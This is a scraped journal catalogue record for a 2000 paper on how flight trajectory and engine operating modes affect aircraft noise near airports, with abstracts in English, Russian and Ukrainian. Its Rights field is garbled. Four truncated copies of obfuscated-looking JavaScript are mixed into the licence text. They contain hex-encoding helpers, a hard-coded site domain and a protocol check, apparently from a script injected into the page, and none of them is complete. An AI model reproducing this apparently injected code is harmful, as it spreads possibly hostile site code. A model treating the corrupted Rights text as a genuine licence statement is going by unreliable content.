Запис Детальніше

Influence of operational factor on the aviation noise level in the neighborhood of the airport

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Influence of operational factor on the aviation noise level in the neighborhood of the airport
Влияние эксплуатационных факторов на уровни авиационного шума в окрестностях аэропорта
Вплив експлуатаційних факторів на рівні авіаційного шуму на околицях аеропорту
 
Creator Запорожец, А. И.; Національний авіаційний університет
Голембиевский, Г. Г.; Національний авіаційний університет
 
Subject

UDC 629.7:534.2


УДК 629.7: 534.2


УДК 629.7:534.2
 
Description There are two determining factors in the evaluation of airplane noise level: the parameters of trajectory location relative to control point and parameters of engine operating conditions. The importance of the given factors can be equal in value therefore calculation of the noise level for real atmospheric conditions with the account of correction due to various acoustic impedance can be insufficient. Estimation of noise radius (NPD dependence) for each type of airplane with the use of acoustic model for atmosphere concrete parameters is necessary in order to receive higher precision of noise estimation in the neighborhood of the airport
Для оценки уровней шума самолета два фактора являются определяющими - парамет­ры расположения траектории относительно точки контроля и параметры режима работы двигателя. Вклад данных факторов может быть эквивалентен по величине, поэтому вычис­ление уровней шума для реальных условий атмосферы только с учетом поправки на разли­чие акустических импедансов может быть недостаточным. Оценка радиусов шума (КРБ- зависимостей) для каждого типа самолета с использованием их акустической модели для конкретных параметров атмосферы необходима для более высокой точности вычисления уровней шума в окрестностях аэропорта
Для оцінки рівней шуму літака два фактори є визначальними - параметри розташування траєкторії відносно точки контролю та параметри режиму роботи двигуна. Внесок цих факторів може бути еквівалентним за величиною, тому розрахунки рівней шуму для реальних умов атмосфери тільки з урахуванням похибки на різницю акустичних інпендансів може бути недостатнім. Оцінка радіусів шуму (МЮ-залежностей) для кожного типу літака з використанням їхньої акустичної моделі для конкретних параметрів атмосфери необхідна для більш високої точності розрахунків рівней шуму на околицях аеропорту
 
Publisher National Aviation University
 
Contributor


 
Date 2017-03-03
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11306
10.18372/2306-1472.7.11306
 
Source Proceedings of the National Aviation University; Том 7, № 3-4 (2000); 296-301
Вестник Национального авиационного университета; Том 7, № 3-4 (2000); 296-301
Вісник Національного Авіаційного Університету; Том 7, № 3-4 (2000); 296-301
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e